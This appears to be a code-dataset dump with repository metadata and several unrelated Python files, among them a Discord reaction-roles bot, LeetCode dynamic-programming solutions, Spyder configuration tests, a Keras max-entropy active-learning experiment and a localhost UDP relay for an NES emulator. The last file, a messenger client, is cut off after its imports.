"2397955090@qq.com"
] | 2397955090@qq.com |
daa66efa2fa8e1a639c548a211243e733270d3e1 | 63ace5832d453e325681d02f6496a0999b72edcb | /benchmark/tests/ed25519_blake2b_tests.py | 5919601af41a2317c191c4864206a57fd69662b9 | [
"MIT"
] | permissive | ebellocchia/bip_utils | c9ec04c687f4247e57434319e36b2abab78f0b32 | d15c75ddd74e4838c396a0d036ef6faf11b06a4b | refs/heads/master | 2023-09-01T13:38:55.567370 | 2023-08-16T17:04:14 | 2023-08-16T17:04:14 | 251,130,186 | 244 | 88 | MIT | 2023-08-23T13:46:19 | 2020-03-29T20:42:48 | Python | UTF-8 | Python | false | false | 1,606 | py | # Copyright (c) 2021 Emanuele Bellocchia
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Imports
from bip_utils import Bip44, Bip44Coins
from tests.bip44_tests import Bip44Tests
# Ed25519Blake2b tests class
class Ed25519Blake2bTests(Bip44Tests):
# Constructor
def __init__(self,
test_num: int,
test_itr_num: int,
test_cache_num: int) -> None:
super().__init__(Bip44,
Bip44Coins.NANO,
test_num,
test_itr_num,
test_cache_num)
| [
"54482000+ebellocchia@users.noreply.github.com"
] | 54482000+ebellocchia@users.noreply.github.com |
9e4fc391a584e7ebf2c2497e63bc5969b3f98b65 | 39dc00c9ac403d93800781b75c4d28079d66c407 | /03_reaction_roles.py | c1747c27ec95a2a25fd6d6cafc8a3528a656a854 | [] | no_license | aleks969/Discord-Bot-Tutorials | 631352c2f030471c2b956dfb820c59944fd2cee3 | 96b4357cf7f520b10de2823a48dd281525059ebf | refs/heads/master | 2023-08-15T00:09:48.680245 | 2021-09-28T04:27:32 | 2021-09-28T04:27:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,181 | py | import discord
"""
client = discord.Client()
@client.event
async def on_ready():
print('Ready')
client.run('')
"""
# https://discordpy.readthedocs.io/en/latest/intents.html
# https://discord.com/developers/docs/topics/gateway#gateway-intents
# https://discord.com/developers/docs/topics/gateway#list-of-intents
class MyClient(discord.Client):
    """Discord client that grants/revokes roles based on reactions added
    to one specific message (simple "reaction roles" bot).

    Fixes over the previous version: the handlers used the module-level
    global ``client`` instead of ``self`` to resolve the guild, and the
    emoji-to-role mapping was duplicated across both handlers.
    """

    # Reaction emoji -> name of the role granted for that reaction.
    REACTION_ROLES = {
        '🥔': 'Potato person',
        '💩': 'Chocolate lover',
        '🐵': 'Funky monkey',
    }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Only reactions on this message trigger role changes.
        self.target_message_id = 891404574114594836

    def _role_for(self, guild, emoji_name):
        """Return the guild Role mapped to *emoji_name*, or None if unmapped."""
        role_name = self.REACTION_ROLES.get(emoji_name)
        if role_name is None:
            return None
        return discord.utils.get(guild.roles, name=role_name)

    async def on_ready(self):
        print('Ready')

    async def on_raw_reaction_add(self, payload):
        """
        Give a role based on a reaction emoji
        """
        if payload.message_id != self.target_message_id:
            return
        guild = self.get_guild(payload.guild_id)
        role = self._role_for(guild, payload.emoji.name)
        if role is not None:
            await payload.member.add_roles(role)

    async def on_raw_reaction_remove(self, payload):
        """
        Remove a role based on a reaction emoji
        """
        if payload.message_id != self.target_message_id:
            return
        guild = self.get_guild(payload.guild_id)
        # Remove events carry no Member object, only the user id.
        member = guild.get_member(payload.user_id)
        role = self._role_for(guild, payload.emoji.name)
        if role is not None:
            await member.remove_roles(role)
# The privileged "members" intent is required so guild.get_member() in
# on_raw_reaction_remove can resolve users from raw payloads.
intents = discord.Intents.default()
intents.members = True
client = MyClient(intents=intents)
client.run('')  # NOTE(review): bot token is blank -- must be filled in to run
| [
"buckyroberts@gmail.com"
] | buckyroberts@gmail.com |
054ace37618a4a5d09d7b5c5c11ecb90b4ad3f39 | b6a31ec10b39a3dbae183ba40c42078cadf88946 | /256. Paint House.py | f7d21cd7ee9430bc39d12fadd63f2ffe33b083ef | [] | no_license | QIAOZHIBAO0104/My-Leetcode-Records | 69fabd11b279f08861cd644973e51bf664da0d90 | 882724c8d50b2f21193c81e5072c31385c5e6b8e | refs/heads/main | 2023-07-11T00:17:02.368441 | 2021-08-07T16:19:45 | 2021-08-07T16:19:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,045 | py | '''
https://leetcode.com/problems/paint-house/
There is a row of n houses, where each house can be painted one of three colors: red, blue, or green.
The cost of painting each house with a certain color is different. You have to paint all the houses such that no two adjacent houses have the same color.
The cost of painting each house with a certain color is represented by a n x 3 cost matrix.
For example, costs[0][0] is the cost of painting house 0 with the color red; costs[1][2] is the cost of painting house 1 with color green, and so on... Find the minimum cost to paint all houses.
Example 1:
Input: costs = [[17,2,17],[16,16,5],[14,3,19]]
Output: 10
Explanation: Paint house 0 into blue, paint house 1 into green, paint house 2 into blue.
Minimum cost: 2 + 5 + 3 = 10.
'''
'''
Dynamic Programming.
Time:O(n)
Space:O(1)
'''
class Solution:
    def minCost(self, costs: List[List[int]]) -> int:
        """Minimum total cost to paint all houses so that no two adjacent
        houses share a color.

        costs[i][c] is the cost of painting house i with color c
        (0=red, 1=blue, 2=green).

        Bottom-up DP keeping only the previous house's three best totals,
        so space drops from the old O(n) table to O(1).
        Time: O(n), Space: O(1).
        """
        if not costs:
            return 0
        # Best totals ending at the previous house, one per color.
        prev = costs[0]
        for red, blue, green in costs[1:]:
            prev = [
                red + min(prev[1], prev[2]),
                blue + min(prev[0], prev[2]),
                green + min(prev[0], prev[1]),
            ]
        return min(prev)
'''
Memoization.
Time:O(n)
Space:O(n)
'''
class Solution:
    def minCost(self, costs: List[List[int]]) -> int:
        """Minimum painting cost via top-down memoized recursion.

        paint(n, color) is the cheapest way to paint houses n..end
        given that house n is painted *color*; results are memoized
        in self.memo keyed by (n, color).
        """
        if costs == []:
            return 0
        self.memo = {}

        def paint(n, color):
            key = (n, color)
            if key in self.memo:
                return self.memo[key]
            money = costs[n][color]
            # Non-last house: add the cheapest continuation using a
            # different color for house n + 1.
            if n < len(costs) - 1:
                money += min(paint(n + 1, c) for c in range(3) if c != color)
            self.memo[key] = money
            return money

        return min(paint(0, c) for c in range(3))
| [
"noreply@github.com"
] | QIAOZHIBAO0104.noreply@github.com |
7e1c7bee1e6cb127c838be3b6a3b85c4cb6533af | 9c148df61545c38f0cbdd00fba3f504458a382b1 | /nes_server.py | 59b8c7d574cdd1cff7357b7b6fe2ea0fd566ad3a | [] | no_license | fafaschiavo/contrAI | 4244d5be76bba35a1f8662a5a95dadc099e0de3e | 3900d10f28afefe492be88948d0cdcdac3d3c537 | refs/heads/master | 2021-04-28T13:25:59.718148 | 2018-03-10T20:57:56 | 2018-03-10T20:57:56 | 122,105,205 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,125 | py | import socket
import json
import os
import glob
from threading import Thread
import time
import sys
import os
import subprocess
import cv2
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), "subfolder"))
screenshots_folder = 'screenshots'
keep_socket_alive = True
data_received = ''
data_to_send = False
class socketThread(Thread):
    """UDP relay thread (Python 2 code: note the print statements).

    Binds a listening socket on input_port and, in a busy loop, sends
    whatever JSON-serializable object the main loop has placed in the
    module-level global ``data_to_send`` to 127.0.0.1:output_port,
    then resets the global to False as an ack.
    NOTE(review): the loop never sleeps (busy-wait) and never reads from
    the bound socket despite the globals suggesting it should.
    """
    IP = '127.0.0.1'
    input_port = 53475
    output_port = 53474
    def __init__(self, input_port, output_port):
        Thread.__init__(self)
        self.input_port = input_port
        self.output_port = output_port
        # Datagram socket used both for the bind and for sending.
        self.UDPSock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
        self.listen_addr = (self.IP,input_port)
        self.UDPSock.bind(self.listen_addr)
    def run(self):
        # Communication with the main loop happens via module globals.
        global keep_socket_alive
        global data_received
        global data_to_send
        while True:
            if data_to_send:
                print 'flag 3'
                self.UDPSock.sendto(bytes(json.dumps(data_to_send)), (self.IP, self.output_port))
                # Signal the main loop that the command was dispatched.
                data_to_send = False
# Start the UDP relay as a daemon thread so it dies with the process.
socket_thread = socketThread(53475, 53474)
socket_thread.daemon = True
socket_thread.start()
# Main loop: twice per second, queue a 'frameadvance' command for the
# relay thread to forward to the emulator over UDP.
while True:
    time.sleep(0.5)
    print 'flag 1'
    data_to_send = {
        'command': 'frameadvance',
    }
"fayschiavo@gmail.com"
] | fayschiavo@gmail.com |
1f735558d3abd06f0aa70ca44547176b357637e3 | 268568ff2d483f39de78a5b29d941ce499cace33 | /spyder/config/tests/test_manager.py | 364c3375e7688e994f5e5540acb1efa9f0e347b9 | [
"MIT"
] | permissive | MarkMoretto/spyder-master | 61e7f8007144562978da9c6adecaa3022758c56f | 5f8c64edc0bbd203a97607950b53a9fcec9d2f0b | refs/heads/master | 2023-01-10T16:34:37.825886 | 2020-08-07T19:07:56 | 2020-08-07T19:07:56 | 285,901,914 | 2 | 1 | MIT | 2022-12-20T13:46:41 | 2020-08-07T19:03:37 | Python | UTF-8 | Python | false | false | 3,509 | py | # -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Tests for config/manager.py."""
# Standard library imports
import os
import os.path as osp
import shutil
import tempfile
# Third party imports
import pytest
# Local imports
from spyder.config.base import get_conf_path, get_conf_paths
from spyder.config.manager import ConfigurationManager
from spyder.plugins.console.plugin import Console
from spyder.py3compat import configparser
def clear_site_config():
    """Remove every site/system configuration folder used by the tests."""
    config_dirs = list(get_conf_paths())
    for config_dir in config_dirs:
        shutil.rmtree(config_dir)
def test_site_config_load():
"""
Test that the site/system config preferences are loaded with correct
precedence.
"""
clear_site_config()
for i, path in enumerate(reversed(get_conf_paths())):
exp_value = 100*(1 + i)
content = '[main]\nmemory_usage/timeout = ' + str(exp_value) + '\n'
conf_fpath = os.path.join(path, 'spyder.ini')
with open(conf_fpath, 'w') as fh:
fh.write(content)
config = ConfigurationManager()
config.reset_to_defaults()
value = config.get('main', 'memory_usage/timeout')
print(path, value, exp_value)
assert value == exp_value
clear_site_config()
def test_external_plugin_config(qtbot):
"""
Test that config for external plugins is saved as expected.
This includes a regression for part two (the shortcuts conflict) of
issue spyder-ide/spyder#11132
"""
clear_site_config()
# Emulate an old Spyder 3 configuration
spy3_config = """
[main]
version = 1.0.0
[shortcuts]
foo/bar = Alt+1
[ipython_console]
startup/run_lines =
"""
conf_fpath = get_conf_path('spyder.ini')
with open(conf_fpath, 'w') as f:
f.write(spy3_config)
# Create config manager
manager = ConfigurationManager()
# Set default options for the internal console
Console.CONF_FILE = True
defaults = [
('internal_console',
{
'max_line_count': 300,
'working_dir_history': 30,
'working_dir_adjusttocontents': False,
'wrap': True,
'codecompletion/auto': False,
'external_editor/path': 'SciTE',
'external_editor/gotoline': '-goto:'
}
),
]
Console.CONF_DEFAULTS = defaults
# Register console plugin config
manager.register_plugin(Console)
# Assert the dummy shortcut is not present in the plugin config
with pytest.raises(configparser.NoSectionError):
manager.get_shortcut('foo', 'bar', plugin_name='internal_console')
# Change an option in the console
console = Console(None, configuration=manager)
console.set_conf_option('max_line_count', 600)
# Read config filew directly
user_path = manager.get_user_config_path()
with open(osp.join(user_path, 'spyder.ini'), 'r') as f:
user_contents = f.read()
plugin_path = manager.get_plugin_config_path('internal_console')
with open(osp.join(plugin_path, 'spyder.ini'), 'r') as f:
plugin_contents = f.read()
# Assert that the change was written to the right config file
assert 'max_line_count = 600' not in user_contents
assert 'max_line_count = 600' in plugin_contents
shutil.rmtree(plugin_path)
Console.CONF_FILE = False
clear_site_config()
if __name__ == "__main__":
pytest.main()
| [
"mark.moretto@forcepoint.com"
] | mark.moretto@forcepoint.com |
46a8322fa4b383f6245a82c54d704d3bd9fcdc76 | 7b35116856a8a2dfcb356245e739236d011a751d | /jesse/indicators/hma.py | 8be9d57b17e466720683ee3e67feb482e4f8aed1 | [
"MIT"
] | permissive | shaunstanislauslau/jesse | a13fa212edd3ff1fa4b1aa743e9ec03efab4e091 | 4a7658813f765287f5aad99b8619d98eac5bfe7b | refs/heads/master | 2023-07-20T14:39:25.232089 | 2021-03-30T16:32:39 | 2021-03-30T16:32:39 | 353,088,903 | 0 | 0 | MIT | 2023-07-06T22:41:29 | 2021-03-30T17:39:46 | null | UTF-8 | Python | false | false | 748 | py | from typing import Union
import numpy as np
import tulipy as ti
from jesse.helpers import get_candle_source, same_length, slice_candles
def hma(candles: np.ndarray, period: int = 5, source_type: str = "close", sequential: bool = False) -> Union[
float, np.ndarray]:
"""
Hull Moving Average
:param candles: np.ndarray
:param period: int - default: 5
:param source_type: str - default: "close"
:param sequential: bool - default=False
:return: float | np.ndarray
"""
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
res = ti.hma(np.ascontiguousarray(source), period=period)
return same_length(candles, res) if sequential else res[-1]
| [
"mysecondworld@firesurf.de"
] | mysecondworld@firesurf.de |
c21aca46aeb7e6aacb91b28c29f10ac5d5f1e5ee | 35f9def6e6d327d3a4a4f2959024eab96f199f09 | /developer/lab/OpenAi/lab/main.py | e816f070d1384fa0cb602ade37d792dc8a2d5945 | [
"MIT",
"CAL-1.0-Combined-Work-Exception",
"CAL-1.0",
"CC-BY-SA-4.0",
"LicenseRef-scancode-free-unknown"
] | permissive | arXiv-research/DevLab-III-1 | ec10aef27e1ca75f206fea11014da8784752e454 | c50cd2b9154c83c3db5e4a11b9e8874f7fb8afa2 | refs/heads/main | 2023-04-16T19:24:58.758519 | 2021-04-28T20:21:23 | 2021-04-28T20:21:23 | 362,599,929 | 2 | 0 | MIT | 2021-04-28T20:36:11 | 2021-04-28T20:36:11 | null | UTF-8 | Python | false | false | 122 | py | from rl.experiment import run
from rl.util import args
if __name__ == '__main__':
run(args.experiment, **vars(args))
| [
"noreply@github.com"
] | arXiv-research.noreply@github.com |
09b390ae6289622e3995c1e7a72ff45395efd0e8 | 11b420a9e6dbe371167227f41ef8e344e3382612 | /ConvNets/FINAL_Averaged_Experiments/N=3000/Q=10/Max_Entropy/Max_Entropy_Q10_N3000.py | 730e0fddd928e420fb8156c8c7c3c1615cbc7e43 | [
"MIT"
] | permissive | tarek-ullah/Active-Learning-Bayesian-Convolutional-Neural-Networks | 7092386758b68dc922efaa2c2eba055930bf2896 | f8b68038bd3b97c473e9c1de6b6cdee4538021f4 | refs/heads/master | 2021-01-13T06:57:19.343775 | 2016-11-02T12:22:16 | 2016-11-02T12:22:16 | 81,338,773 | 1 | 0 | null | 2017-02-08T14:34:15 | 2017-02-08T14:34:15 | null | UTF-8 | Python | false | false | 11,816 | py | from __future__ import print_function
from keras.datasets import mnist
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD, Adadelta, Adagrad, Adam
from keras.utils import np_utils, generic_utils
from six.moves import range
import numpy as np
import scipy as sp
from keras import backend as K
import random
import scipy.io
import matplotlib.pyplot as plt
from keras.regularizers import l2, activity_l2
Experiments = 3
batch_size = 128
nb_classes = 10
#use a large number of epochs
nb_epoch = 80
# input image dimensions
img_rows, img_cols = 28, 28
# number of convolutional filters to use
nb_filters = 32
# size of pooling area for max pooling
nb_pool = 2
# convolution kernel size
nb_conv = 3
score=0
all_accuracy = 0
acquisition_iterations = 290
#use a large number of dropout iterations
Queries = 10
Experiments_All_Accuracy = np.zeros(shape=(acquisition_iterations+1))
for e in range(Experiments):
print('Experiment Number ', e)
# the data, shuffled and split between tran and test sets
(X_train_All, y_train_All), (X_test, y_test) = mnist.load_data()
X_train_All = X_train_All.reshape(X_train_All.shape[0], 1, img_rows, img_cols)
X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)
random_split = np.asarray(random.sample(range(0,X_train_All.shape[0]), X_train_All.shape[0]))
X_train_All = X_train_All[random_split, :, :, :]
y_train_All = y_train_All[random_split]
X_valid = X_train_All[10000:15000, :, :, :]
y_valid = y_train_All[10000:15000]
X_Pool = X_train_All[20000:60000, :, :, :]
y_Pool = y_train_All[20000:60000]
X_train_All = X_train_All[0:10000, :, :, :]
y_train_All = y_train_All[0:10000]
#training data to have equal distribution of classes
idx_0 = np.array( np.where(y_train_All==0) ).T
idx_0 = idx_0[0:10,0]
X_0 = X_train_All[idx_0, :, :, :]
y_0 = y_train_All[idx_0]
idx_1 = np.array( np.where(y_train_All==1) ).T
idx_1 = idx_1[0:10,0]
X_1 = X_train_All[idx_1, :, :, :]
y_1 = y_train_All[idx_1]
idx_2 = np.array( np.where(y_train_All==2) ).T
idx_2 = idx_2[0:10,0]
X_2 = X_train_All[idx_2, :, :, :]
y_2 = y_train_All[idx_2]
idx_3 = np.array( np.where(y_train_All==3) ).T
idx_3 = idx_3[0:10,0]
X_3 = X_train_All[idx_3, :, :, :]
y_3 = y_train_All[idx_3]
idx_4 = np.array( np.where(y_train_All==4) ).T
idx_4 = idx_4[0:10,0]
X_4 = X_train_All[idx_4, :, :, :]
y_4 = y_train_All[idx_4]
idx_5 = np.array( np.where(y_train_All==5) ).T
idx_5 = idx_5[0:10,0]
X_5 = X_train_All[idx_5, :, :, :]
y_5 = y_train_All[idx_5]
idx_6 = np.array( np.where(y_train_All==6) ).T
idx_6 = idx_6[0:10,0]
X_6 = X_train_All[idx_6, :, :, :]
y_6 = y_train_All[idx_6]
idx_7 = np.array( np.where(y_train_All==7) ).T
idx_7 = idx_7[0:10,0]
X_7 = X_train_All[idx_7, :, :, :]
y_7 = y_train_All[idx_7]
idx_8 = np.array( np.where(y_train_All==8) ).T
idx_8 = idx_8[0:10,0]
X_8 = X_train_All[idx_8, :, :, :]
y_8 = y_train_All[idx_8]
idx_9 = np.array( np.where(y_train_All==9) ).T
idx_9 = idx_9[0:10,0]
X_9 = X_train_All[idx_9, :, :, :]
y_9 = y_train_All[idx_9]
X_train = np.concatenate((X_0, X_1, X_2, X_3, X_4, X_5, X_6, X_7, X_8, X_9), axis=0 )
y_train = np.concatenate((y_0, y_1, y_2, y_3, y_4, y_5, y_6, y_7, y_8, y_9), axis=0 )
print('X_train shape:', X_train.shape)
print(X_train.shape[0], 'train samples')
print('Distribution of Training Classes:', np.bincount(y_train))
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_valid = X_valid.astype('float32')
X_Pool = X_Pool.astype('float32')
X_train /= 255
X_valid /= 255
X_Pool /= 255
X_test /= 255
Y_test = np_utils.to_categorical(y_test, nb_classes)
Y_valid = np_utils.to_categorical(y_valid, nb_classes)
Y_Pool = np_utils.to_categorical(y_Pool, nb_classes)
#loss values in each experiment
Pool_Valid_Loss = np.zeros(shape=(nb_epoch, 1))
Pool_Train_Loss = np.zeros(shape=(nb_epoch, 1))
Pool_Valid_Acc = np.zeros(shape=(nb_epoch, 1))
Pool_Train_Acc = np.zeros(shape=(nb_epoch, 1))
x_pool_All = np.zeros(shape=(1))
Y_train = np_utils.to_categorical(y_train, nb_classes)
print('Training Model Without Acquisitions in Experiment', e)
model = Sequential()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv, border_mode='valid', input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Convolution2D(nb_filters*2, nb_conv, nb_conv, border_mode='valid', input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters*2, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
c = 10
Weight_Decay = c / float(X_train.shape[0])
model.add(Flatten())
model.add(Dense(128, W_regularizer=l2(Weight_Decay)))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
hist = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_valid, Y_valid))
Train_Result_Optimizer = hist.history
Train_Loss = np.asarray(Train_Result_Optimizer.get('loss'))
Train_Loss = np.array([Train_Loss]).T
Valid_Loss = np.asarray(Train_Result_Optimizer.get('val_loss'))
Valid_Loss = np.asarray([Valid_Loss]).T
Train_Acc = np.asarray(Train_Result_Optimizer.get('acc'))
Train_Acc = np.array([Train_Acc]).T
Valid_Acc = np.asarray(Train_Result_Optimizer.get('val_acc'))
Valid_Acc = np.asarray([Valid_Acc]).T
Pool_Train_Loss = Train_Loss
Pool_Valid_Loss = Valid_Loss
Pool_Train_Acc = Train_Acc
Pool_Valid_Acc = Valid_Acc
Pool_Train_Loss = Train_Loss
Pool_Valid_Loss = Valid_Loss
print('Evaluating Test Accuracy Without Acquisition')
score, acc = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)
all_accuracy = acc
print('Starting Active Learning in Experiment ', e)
for i in range(acquisition_iterations):
print('POOLING ITERATION', i)
print('Using trained model for Entropy Calculation')
Class_Probability = model.predict_proba(X_Pool, batch_size=batch_size, verbose=1)
Class_Log_Probability = np.log2(Class_Probability)
Entropy_Each_Cell = - np.multiply(Class_Probability, Class_Log_Probability)
Entropy = np.sum(Entropy_Each_Cell, axis=1) # summing across rows of the array
#x_pool_index = np.unravel_index(Entropy.argmax(), Entropy.shape) #for finding the maximum value np.amax(Entropy)
x_pool_index = Entropy.argsort()[-Queries:][::-1]
# THIS FINDS THE INDEX OF THE MINIMUM
# a_1d = Entropy.flatten()
# x_pool_index = a_1d.argsort()[-N:]
#saving pooled images
# for im in range(x_pool_index[0:2].shape[0]):
# Image = X_Pool[x_pool_index[im], :, :, :]
# img = Image.reshape((28,28))
# sp.misc.imsave('/home/ri258/Documents/Project/Active-Learning-Deep-Convolutional-Neural-Networks/ConvNets/Cluster_Experiments/Max_Entropy/Pooled_Images/' + 'Experiment_' + str(e) +'Pool_Iter'+str(i)+'_Image_'+str(im)+'.jpg', img)
#store all the pooled images indexes
x_pool_All = np.append(x_pool_All, x_pool_index)
Pooled_X = X_Pool[x_pool_index, :, :, :]
Pooled_Y = y_Pool[x_pool_index] # true label from the oracle
print('Acquised Points added to training set')
X_train = np.concatenate((X_train, Pooled_X), axis=0)
y_train = np.concatenate((y_train, Pooled_Y), axis=0)
#delete the currently pooled points from the pool set
X_Pool = np.delete(X_Pool, x_pool_index, 0)
print('Training Model with pooled points')
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, nb_classes)
model = Sequential()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv, border_mode='valid', input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
c = 10
Weight_Decay = c / float(X_train.shape[0])
model.add(Flatten())
model.add(Dense(128, W_regularizer=l2(Weight_Decay)))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
hist = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_valid, Y_valid))
Train_Result_Optimizer = hist.history
Train_Loss = np.asarray(Train_Result_Optimizer.get('loss'))
Train_Loss = np.array([Train_Loss]).T
Valid_Loss = np.asarray(Train_Result_Optimizer.get('val_loss'))
Valid_Loss = np.asarray([Valid_Loss]).T
Train_Acc = np.asarray(Train_Result_Optimizer.get('acc'))
Train_Acc = np.array([Train_Acc]).T
Valid_Acc = np.asarray(Train_Result_Optimizer.get('val_acc'))
Valid_Acc = np.asarray([Valid_Acc]).T
#Accumulate the training and validation/test loss after every pooling iteration - for plotting
Pool_Valid_Loss = np.append(Pool_Valid_Loss, Valid_Loss, axis=1)
Pool_Train_Loss = np.append(Pool_Train_Loss, Train_Loss, axis=1)
Pool_Valid_Acc = np.append(Pool_Valid_Acc, Valid_Acc, axis=1)
Pool_Train_Acc = np.append(Pool_Train_Acc, Train_Acc, axis=1)
print('Evaluate Model Test Accuracy with pooled points')
score, acc = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)
print('Test score:', score)
print('Test accuracy:', acc)
all_accuracy = np.append(all_accuracy, acc)
print('Use this trained model with pooled points for Dropout again')
print('Storing Accuracy Values over experiments')
Experiments_All_Accuracy = Experiments_All_Accuracy + all_accuracy
print('Saving Results Per Experiment')
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+'Averaged_Main_Max_Entropy_Q10_N3000_Train_Loss_'+ 'Experiment_' + str(e) + '.npy', Pool_Train_Loss)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+ 'Averaged_Main_Max_Entropy_Q10_N3000_Valid_Loss_'+ 'Experiment_' + str(e) + '.npy', Pool_Valid_Loss)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+'Averaged_Main_Max_Entropy_Q10_N3000_Train_Acc_'+ 'Experiment_' + str(e) + '.npy', Pool_Train_Acc)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+ 'Averaged_Main_Max_Entropy_Q10_N3000_Valid_Acc_'+ 'Experiment_' + str(e) + '.npy', Pool_Valid_Acc)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+'Averaged_Main_Max_Entropy_Q10_N3000_Pooled_Image_Index_'+ 'Experiment_' + str(e) + '.npy', x_pool_All)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+ 'Averaged_Main_Max_Entropy_Q10_N3000_Accuracy_Results_'+ 'Experiment_' + str(e) + '.npy', all_accuracy)
print('Saving Average Accuracy Over Experiments')
Average_Accuracy = np.divide(Experiments_All_Accuracy, Experiments)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+'Averaged_Main_Max_Entropy_Q10_N3000_Average_Accuracy'+'.npy', Average_Accuracy)
| [
"riashat.islam.93@gmail.com"
] | riashat.islam.93@gmail.com |
4feb30114b2c476812f4f003b8dcdf252ef3718e | e262e64415335060868e9f7f73ab8701e3be2f7b | /.history/demo1_20201107181245.py | 2f6a553cf350e59408c1cbdc619074b719aa1300 | [] | no_license | Allison001/developer_test | 6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63 | b8e04b4b248b0c10a35e93128a5323165990052c | refs/heads/master | 2023-06-18T08:46:40.202383 | 2021-07-23T03:31:54 | 2021-07-23T03:31:54 | 322,807,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | # import sys
# import yaml
# from demo import search
# from demo import a
# from demo import search1
# search("A")
# print(a)
# search1(12)
# print(dir())
# print(sys.path)
# name = "zhang"
# age = 12
# print("my name is:{0},my age is:{1}".format(name,age))
# list1 = [1,3,2]
# dic1 = {"a":1,"b":2}
# print("List is :{},Dic is :{}".format(list1,dic1))
# print("list id :%s,Dic is :%s" %(list1,dic1))
# list = ["happy",'nause','doctor']
# print("my job is:%s,%s,%s" %(list[0],list[1],list[2]))
# print("my job is:{},{},{}".format(*list))
# dic1 = {"name":"tom","age":12}
# print("my name is:{name},my age is: {age}".format(**dic1))
# print("my name is:%s,my age is:%d" %(dic1["name"],dic1["age"]))
name = "allison"
age = 23
| [
"zhangyingxbba@gmail.com"
] | zhangyingxbba@gmail.com |
594eea4c930aca5711b3e1ffab4751c1af242b54 | f35e820678dd9ba88195abf8739826222236736e | /client/main_window.py | 8dbe6be3a4bda3d3d95751e68912d2e27cf10e79 | [] | no_license | spoliv/Messenger | a58065b13cdfb7f41e4f0213ccc9383f4e4b1e4c | ecb1bb2559cc5a8b3f537f510eafb2c21f2a2fe5 | refs/heads/master | 2022-12-24T21:30:17.695897 | 2020-09-28T15:58:03 | 2020-09-28T15:58:03 | 299,356,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,793 | py | from common.constants import *
from common.errors import ServerError
from client.start_dialog import UserNameDialog
from client.transport import ClientTransfer, send_message
from client.database import ClientDatabase
from client.del_contact import DelContactDialog
from client.add_contact import AddContactDialog
from client.main_window_conv import Ui_MainClientWindow
from PyQt5.QtWidgets import (
QMainWindow,
qApp,
QMessageBox,
QApplication,
